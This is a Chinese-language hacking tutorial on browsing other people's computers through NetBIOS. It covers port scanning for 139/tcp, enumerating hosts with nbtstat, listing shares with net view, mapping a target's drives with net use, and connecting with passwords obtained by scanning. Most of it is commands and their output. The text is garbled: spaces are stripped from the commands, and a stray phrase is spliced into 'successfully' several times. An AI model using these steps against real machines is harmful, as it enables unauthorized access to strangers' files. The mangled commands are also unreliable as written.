利用NetBIOS浏览他人电脑中的资料

（Networkbasicinputoutputsystem）即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。



1.NetBIOS



TouseNetBIOSremotelythecomputerhastohaveitrunningandunprotectedfirst.TofindifacomputerhasnetBIOSboostupyourfavouriteportscannerandlookfornetBIOS:

要远程使用NetBIOS，目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描：

25/tcpopensmtp

110/tcpopenpop-3

135/tcpopenloc-srv

139/tcpopennetBIOS-ssn



如果结果如上，恭喜...



2.nbtstat



我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。







输入命令:

--------------------------------------------------------------------------------

c:\>nbtstat-A127.0.0.1

--------------------------------------------------------------------------------



如果使用IP地址就使用-A，使用主机名则使用-a.



运行后将获得如下信息：



code:--------------------------------------------------------------------------------

LocalAreaConnection3:

NodeIpAddress:[xxx.xxx.xxx.xxx]ScopeId:[]



NetBIOSRemoteMachineNameTable



Name　　　　　　　Type　　　　Status

---------------------------------------------

computername　　　<00>　UNIQUE　　　Registered

workgroupname　　<00>　GROUP　　　Registered

computername　　　<20>　UNIQUE　　　Registered

workgroupname　　<1E>　GROUP　　　Registered

workgroupname　　<1D>　UNIQUE　　　Registered

..__MSBROWSE__.　<01>　GROUP　　　Registered



MACAddress=xx-xx-xx-xx-xx-xx　　　　

--------------------------------------------------------------------------------







下面这一行

--------------------------------------------------------------------------------

computername　　　<20>　UNIQUE　　　Registered--------------------------------------------------------------------------------



很有用，因为<20>表示文件共享已经启用了。那就意味着我们可以尝试连接到该电脑。

首先，我们需要知道硬盘名称等信息，并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令：

netview\ipaddress来完成。



输入:

--------------------------------------------------------------------------------

C:\>netview\127.0.0.1

Sharedresourcesat\xxx.xxx.xxx.xxx

Sharename　Type　Usedas　Comment



-----------------------------------

SharedDocs　Disk

Thecommandcompletedsucces单机传奇ully.

--------------------------------------------------------------------------------





应该获得如上显示信息(在非XP系统中会有所不同).



该做点有趣的事情了:如果想要像使用本地计算机一样使用和浏览该电脑，我们可以使用netuse。格式如下：

netuseletter:\ipaddress\name



输入:

--------------------------------------------------------------------------------

c:\>netuseg:\127.0.0.1\SharedDocs

Thecommandcompletedsucces单机传奇ully.

c:\>netuseh:\127.0.0.1\C

Thecommandcompletedsucces单机传奇ully.

--------------------------------------------------------------------------------





现在目标计算机的硬盘已映射为我们刚刚指定的盘符。（确保这一盘符不与本地电脑已使用盘符冲突）完成后就可以如同浏览本地电脑一样进行浏览：



输入:

--------------------------------------------------------------------------------

c:\>cdg:

g:\>

--------------------------------------------------------------------------------





在windowsXP中，可以直接打开&ldquo;我的电脑&rdquo;，在图形界面下浏览刚刚添加的映射盘.



完成后，记得要从机器中删除映射盘。



输入:

--------------------------------------------------------------------------------

c:\>netuse/deleteg:

g:wasdeletedsucces单机传奇ully.

--------------------------------------------------------------------------------





有些系统需要密码才可以进入(win2k,WinNT):（可以通过扫描器扫描）

获得密码后可使用如下命令进入:





--------------------------------------------------------------------------------

netusepassword\ip\sharename
*
*